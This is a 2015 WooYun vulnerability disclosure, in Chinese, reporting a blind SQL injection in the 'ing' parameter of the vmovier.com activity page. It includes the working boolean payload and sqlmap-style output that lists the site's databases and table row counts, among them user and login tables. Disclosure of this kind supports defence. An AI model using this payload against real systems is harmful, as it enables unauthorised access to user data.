当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115149

漏洞标题:V电影主站SQL注射,影响全站数据库

相关厂商:vmovier.com

漏洞作者: 路人甲

提交时间:2015-05-20 14:31

修复时间:2015-07-04 16:34

公开时间:2015-07-04 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

233

详细说明:

www.vmovier.com/activity?ing=2
注入点不复杂,直接盲注

漏洞证明:

---
Parameter: ing (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ing=2) AND 4422=4422 AND (1427=1427
---
web application technology: PHP 5.4.25
back-end DBMS: MySQL 5
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sns
[*] wechat
部分数据库信息如下:
Database: sns
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| v_search_log | 4520367 |
| ts_article_view | 1243630 |
| ts_user_follow | 885994 |
| ts_visitor | 766180 |
| v_statis_post | 585257 |
| v_user_view | 491295 |
| v_notice | 338652 |
| v_app_notice | 317077 |
| ts_group_topics_view | 241841 |
| ts_user | 177595 |
| ts_user_info | 177388 |
| ts_user_bind | 176211 |
| ts_message | 154819 |
| v_user_post | 152742 |
| v_ad_statistic | 124319 |
| ts_feed | 99460 |
| ts_user_space | 93801 |
| v_search | 90738 |
| v_comment | 86623 |
| ts_group_users | 59345 |
| ts_user_domain_visit | 51671 |
| ts_station_user | 43683 |
| ts_invite | 40016 |
| ts_hide_system_msg_list | 36595 |
| ts_article_comment | 33392 |
| ts_plats_users | 27984 |
| v_404 | 25820 |
| ts_user_login | 25197 |
| v_user_series | 20571 |
| v_tag_post | 20176 |
| ts_article_like | 17067 |
| ts_article | 13180 |
| ts_kw | 12596 |
| v_tag | 12157 |
| ts_group_view | 11855 |
| ts_stills_photo | 11148 |
| v_cate_post | 9724 |
| ts_tag_user_index | 9160 |
| v_user_comment | 9106 |
| ts_user_bind_n | 7410 |
| ts_station_view | 7347 |
| v_post | 6871 |
| ts_article_videos | 5940 |
| v_rating | 5723 |
| ts_article_recommend | 5208 |
| ts_tag_exp_index | 4786 |
| v_user_series_post | 4438 |
| ts_comment_approve | 4227 |
| ts_group_topics_comments | 4207 |
| ts_user_verify | 3625 |
| v_post_add | 3603 |
| v_activity_form | 3366 |
| ts_invitation_code | 3365 |
| ts_area | 3144 |
| v_qiniu_notice | 3020 |
| v_graduation_like | 2666 |
| ts_tag | 2601 |
| v_movie | 2469 |
| v_ac_like | 2201 |
| ts_square_new_old | 1923 |
| ts_exp | 1921 |
| ts_square_new | 1905 |
| ts_group_topics | 1891 |
| v_video_cs | 1798 |
| ts_article_collect | 1781 |
| ts_day_home | 1749 |
| ts_stills | 1554 |
| v_user_album | 1179 |
| v_video_recommend | 1163 |
| v_content_find | 1111 |
| ts_banner_log | 1095 |
| v_series_post | 1081 |
。。。。。

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-05-20 16:32

厂商回复:

非常感谢发现该漏洞

最新状态:

暂无